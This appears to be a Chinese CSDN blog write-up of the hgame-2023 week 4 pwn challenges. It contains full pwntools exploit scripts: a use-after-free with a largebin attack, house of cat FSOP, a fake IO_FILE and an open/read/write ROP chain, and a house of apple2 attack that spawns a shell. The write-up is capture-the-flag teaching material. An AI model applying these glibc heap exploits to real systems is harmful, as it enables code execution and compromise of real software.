hgame-2023-week4

最新推荐文章于 2024-04-03 17:17:21 发布
最新推荐文章于 2024-04-03 17:17:21 发布
阅读量425 收藏 1
点赞数 2
文章标签: python 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73290593/article/details/128936498
版权

hgame-2023

文章目录

week4

withouthook

​ 存在UAF,跟week3先是一样,利用largebinattack,在IO_list_all写入可控堆地址,再伪造IO_FILE打IO即可

​ 我这里使用的是house of cat

​ 调用链:

_IO_wfile_seekoff
	_IO_switch_to_wget_mode(fp)
		_IO_WOVERFLOW(fp,WEOF)

House of cat

脚本如下:

from pwn import *
#p=remote("week-4.hgame.lwsec.cn",31394)
p=process("./withouthook")
libc=ELF("./libc.so.6")

menu=">"

def add(index,size):
    p.sendlineafter(menu,'1')
    p.sendlineafter("Index: ",str(index))
    p.sendlineafter("Size: ",str(size))

def delete(index):
    p.sendlineafter(menu,'2')
    p.sendlineafter("Index: ",str(index))

def edit(index,content):
    p.sendlineafter(menu,'3')
    p.sendlineafter("Index: ",str(index))
    p.sendafter("Content: ",content)

def show(index):
    p.sendlineafter(menu,'4')
    p.sendlineafter("Index: ",str(index))

def debug():
    gdb.attach(p)
    pause()
    
#=============
# house of cat
#=============
def pwn():
    add(0,0x520)
    add(1,0x508)
    add(2,0x510)
    add(3,0x500)

    delete(0)
    delete(2)

    show(2)
    heap_base=u64(p.recv(6).ljust(8,'\x00'))-0x290
    print("heap_base-->"+hex(heap_base))
    
    add(4,0x510)# 2&4 unsortedbin
    delete(2)

    show(0)# largebin
    libc_base=u64(p.recv(6).ljust(8,'\x00'))-0x1f70f0
    _IO_list_all=libc_base+libc.sym["_IO_list_all"]
    _IO_wfile_jumps=libc_base+libc.sym["_IO_wfile_jumps"]
    setcontext=libc_base+libc.sym["setcontext"]+61
    open_addr=libc_base+libc.sym["open"]
    svcudp_reply=libc_base+0x162f0a
    magic=libc_base+0x8c265
    syscall_ret=libc_base+0x8cb16
    pop_rdi_ret=libc_base+0x23ba5
    pop_rsi_ret=libc_base+0x251fe
    pop_rdx_rbx_ret=libc_base+0x8bbb9
    pop_rax_ret=libc_base+0x3f923
    pop_rsp_ret=libc_base+0x2eb71
    leave_ret=libc_base+0x50757
    ret_addr=libc_base+0x22d19
    print("libc_base-->"+hex(libc_base))

    payload=p64(libc_base+0x1f70f0)*2+p64(heap_base+0x290)+p64(_IO_list_all-0x20)
    edit(0,payload)

    add(5,0x550)# 2&4 into largebin & largebin attack

    heap1_addr=heap_base+0x7d0
    heap3_addr=heap_base+0x1200
    heap5_addr=heap_base+0x1710

    fake_IO_file=''
    fake_IO_file=fake_IO_file.ljust(0x68-0x10,'\x00')+p64(heap5_addr)
    edit(4,fake_IO_file)

    fake_io_addr=heap5_addr

    fake_IO_FILE = p64(0)# _flags=rdi
    fake_IO_FILE +=p64(0)*7
    fake_IO_FILE +=p64(1)+p64(2) # rcx!=0(FSOP)
    fake_IO_FILE +=p64(heap1_addr)#_IO_backup_base=rdx
    fake_IO_FILE +=p64(setcontext)# _IO_save_end=call addr(call setcontext/system)
    fake_IO_FILE = fake_IO_FILE.ljust(0x68, '\x00')
    fake_IO_FILE += p64(0)  # _chain
    fake_IO_FILE = fake_IO_FILE.ljust(0x88, '\x00')
    fake_IO_FILE += p64(heap_base+0x1000)  # _lock = a writable address
    fake_IO_FILE = fake_IO_FILE.ljust(0xa0, '\x00')
    fake_IO_FILE +=p64(fake_io_addr+0x30)#_wide_data,rax1_addr
    fake_IO_FILE = fake_IO_FILE.ljust(0xc0, '\x00')
    fake_IO_FILE += p64(1) #mode=1
    fake_IO_FILE = fake_IO_FILE.ljust(0xd8, '\x00')
    fake_IO_FILE += p64(_IO_wfile_jumps+0x30)  # (assert)vtable=IO_wfile_jumps+0x10 & (fsop)_IO_wfile_jumps+0x30
    fake_IO_FILE +=p64(0)*6
    fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr
    edit(5,fake_IO_FILE)

    rop='./flag\x00\x00'
    rop=rop.ljust(0xa0,'\x00')+p64(heap1_addr+0x200)+p64(ret_addr)

    orw=p64(pop_rdi_ret)+p64(heap1_addr)
    orw+=p64(pop_rsi_ret)+p64(0)
    orw+=p64(pop_rax_ret)+p64(2)
    orw+=p64(syscall_ret)
    
    orw+=p64(pop_rdi_ret)+p64(3)
    orw+=p64(pop_rsi_ret)+p64(heap1_addr+0x150)
    orw+=p64(pop_rdx_rbx_ret)+p64(0x45)+p64(0)
    orw+=p64(pop_rax_ret)+p64(0)
    orw+=p64(syscall_ret)

    orw+=p64(pop_rdi_ret)+p64(1)
    orw+=p64(pop_rsi_ret)+p64(heap1_addr+0x150)
    orw+=p64(pop_rdx_rbx_ret)+p64(0x45)+p64(0)
    orw+=p64(pop_rax_ret)+p64(1)
    orw+=p64(syscall_ret)

    rop=rop.ljust(0x200,'\x00')+orw
    edit(1,rop)
    #gdb.attach(p)
    p.sendlineafter(menu,'5')
    p.interactive()

pwn()

4nswer’s gift

比上一题还简单,直接告诉你IO_list_all的地址,以此能得到libc_base,然后把你申请size大小的chunk的链入IO_list_all,就可以直接打IO,用house of apple2即可,详细学习链接见,week3的largenote

from pwn import *
context.update(os='linux',arch='amd64',timeout=1)
context.log_level='debug'
binary='./gift'
elf=ELF(binary)
libc=ELF('./libc.so.6')
debug=0
if debug:
    libc=elf.libc
    p=process(binary)
else:
    host='week-4.hgame.lwsec.cn'
    port='32622'
    p=remote(host,port)

#================
# house of apple2
#================

def pwn():
    p.recvuntil("this: ")
    libc_base=int(p.recv(14),16)-libc.sym["_IO_list_all"]
    system_addr=libc_base+libc.sym["system"]
    _IO_str_jumps=libc_base+0x1f36a0
    _IO_wfile_jumps=libc_base+libc.sym["_IO_wfile_jumps"]
    bin_sh_addr=libc_base+libc.search("/bin/sh").next()
    print("libc_base-->"+hex(libc_base))

    p.recvuntil("gift?")
    p.sendline(str(0x30000))

    heap_addr=libc_base-0x33ff0
    print("heap_addr-->"+hex(heap_addr))

    fake_IO_FILE='  sh;'.ljust(8,'\x00')
    fake_IO_FILE=fake_IO_FILE.ljust(0x28,'\x00')+p64(1)# _write_ptr
    fake_IO_FILE=fake_IO_FILE.ljust(0xa0,'\x00')+p64(heap_addr+0x100)# _wide_data
    fake_IO_FILE=fake_IO_FILE.ljust(0xd8,'\x00')+p64(_IO_wfile_jumps)# _vtable
    fake_IO_FILE=fake_IO_FILE.ljust(0x100,'\x00')

    fake_wide_data=''
    fake_wide_data=fake_wide_data.ljust(0xe0,'\x00')+p64(heap_addr+0x200)# _wide_vtable
    fake_wide_data=fake_wide_data.ljust(0x100,'\x00')

    fake_vtable=''
    fake_vtable=fake_vtable.ljust(0x68,'\x00')+p64(system_addr)

    fake_IO_FILE=fake_IO_FILE+fake_wide_data+fake_vtable

    p.recvuntil("gitf?")
    #gdb.attach(p)
    p.send(fake_IO_FILE)

    p.interactive()

pwn()

后言:

​ 从四周的hgame学到了很多东西,只能说出题人很有想法,后两周出的都是高版本的glibc,虽然难上很多,但是更容易对接现在的题目类型,我本人也是第一次打高版本,一开始觉得很难,但是出题人给的都是直接的UAF,使攻击方法更容易实现,主要学的是新的攻击方法,也学到了一些常用的打IO的方法,受益匪浅,最后也是在woodwhale学长,niyah学长的帮助下(十分感谢这两位学长),成功ak了hgame的pwn,太开心力

enllus1on
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
vm 比较经典的虚拟机的题目是南邮的cg-ctf的题目, 然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来, 后面那个hagem的题目中间有一个栈的结构,也是比较有感觉的虚拟机题目了 另外hgame已经结束:https://hgame.vidar.club/#/user/login?return=Challenge-List cg-ctf: https://cgctf.nuptsast.com/challenges#Re 题目文件:
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
hgame2023-week4
247533的博客
02-08 490
hgame2023-week4
Hgame 2024 week4 Crypto WP
最新发布
qq_41889600的博客
04-03 858
2024 Hgame week4 抽空写一下wp
hgame2023 week4 writeup
02-13 1287
hgame2023 week4 writeup
Hgame-Week4
qq_53086690的博客
03-03 193
目录Webmacguffin Web macguffin 地址 :http://macguffin.0727.site:5000/ 提示:在我长大的这个城市里,每个人都有超越寻常的特长。我可以重启这个世界(是的整个世界),不仅仅是将时钟往回拨,而是将世界的一切,从原子层面恢复到一天前的状态。只有看到有人在哭泣时,我才会重启。包括我的记忆,全部重启。但是,不用担心,我的搭档有绝对记忆。然而,我们被困在了这一天里,漫无止境的星期日。有情报说,只要我们重启了这一天,“MacGuffin” 便会出现在我们面前,并
CTF-Reverse---VM虚拟机逆向&[HGAME 2023 week4]vm题目复现【详解】
Sciurdae的博客
11-02 924
没有前言。终于搞定第二题了。费劲是真的费。题目在nssctf上有。
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
Tales Of Vesperia HD Wallpapers Game Theme-crx插件
03-14
包括每个选项卡背景上来自hgame Tasp Of Vesperia Definitive的高清壁纸图像。 安装此扩展程序,以在每个新选项卡上获得《 Vesperia传说最终版》的高清图像! 我们始终会更新图像,因此请随时检查...我们将为您提供5...
HGAME-week4-web-wp
静仙的博客
02-19 4608
文章目录hgame第四周-web1.Markdown Online2.Comment3.FileSystem hgame第四周-web 1.Markdown Online 考点:markdown xss,nodejs vm逃逸,JavaScript语言特性 参考:[HGAME 2022 WEB | Y0ng的博客 (yongsheng.site)](http://www.yongsheng.site/2022/02/17/HGAME 2022 WEB/#more) 以及官方wp和github的payload
hgame week4-writeup
wuerror的博客
02-23 607
week4-writeup wuerror web happy python {u’csrf_token’: u’a844480fd5e2cd4c8e3107765aa25923572cd2df’, u’_fresh’: True, u’user_id’: u’admin’, u’_id’: u’051101fca32cbd279dfd6e96892ec55881e06fcb6a52872d04c...
HGAME2020 Week4 Writeup
wh201906的博客
02-14 1300
完结撒花 Crypto - ToyCipher_Linear 题目: Why encryption based on XOR and Rotation is easy to break? 还有加解密的脚本: #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os, binascii from secret import flag d...
hgame2023 Web&Misc
qq_61768489的博客
02-09 1803
hgame2023 Web&Misc
HGame 2023 Week4 部分Writeup
vvbbnn00的专栏
02-06 3131
第四周的比赛难度较高,同时也出现了不少颇为有趣的题目。可惜笔者比较菜,做出来的题目数量并不是很多,不过里面确实有几道题值得好好讲讲。不多废话了,抓紧端上来吧(喜)。 注:本周CRYPTO类的赛题ECRSA在数学大佬的帮助下解出;本周REVERSE类赛题vm由大佬Latihas提供思路指导,在这里表达感谢!
HGAME 2023 Week1
ph0ebus的博客
01-13 2155
Week1的大多数题对我这样的萌新还是很友好的,虽然但是还是很多没解出来,不过还是学到了蛮多东西,浅浅记录一下。
[虚拟机保护逆向] [HGAME 2023 week4]vm
m0_62102520的博客
03-09 907
根基题目来看,这是一道虚拟机保护逆向的题,这里的虚拟机不是传统意义上像VMware 的虚拟机,这里只是一个程序,执行了像cpu那样取指令、执行指令的操作,与汇编指令类似,但是这里的指令硬件编码经过了作者的修改(opcode),再结合其本身的编译器,和一些虚拟cpu的环境,来实现类似于cpu执行指令的操作,给逆向增加难度。 虚拟机的逆向题,一般分三个步骤:首先根据逻辑推测出各种寄存器(通用寄存器 和 ip),ip是指向当前硬件编码的指针,有他取出指令,然后根据程序具体取出的硬件编码和其对应的函数(指令)功能,
[HGAME 2022 week4]ezvm 复现
m0_75098930的博客
04-04 462
本题主要采用的是动调的方式,看别人的wp写判断输入是32位字符串,我一直没找到在哪,最后实在没办法了,带入了答案flag,断点下在switch上,因为找不到指令,f9很长一段时间后,我发现,终于,指令的调用有了变化,最开始一直在getchar循环,到这时才调用了xor和*=2(看别人wp说是左移一位,都一样),也就是说,这时才进行加密,也直到这时,我才看到了指令集的偏移,到这里了,就没管指令了,反正是exe,干脆直接调下去。64维exe,无壳,看名字知道这是vm的题,放入ida,进入main函数。
pwnhub2023内部赛
weixin_73290593的博客
03-14 239
1.输出name时,%s可以leak栈地址,age和high部分,scanf输入‘-’可以不改变原来地址的值,即可泄露libc地址。2.edit存在off-by-one,来制造overlapping,控制fd指针,打__free_hook即可。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值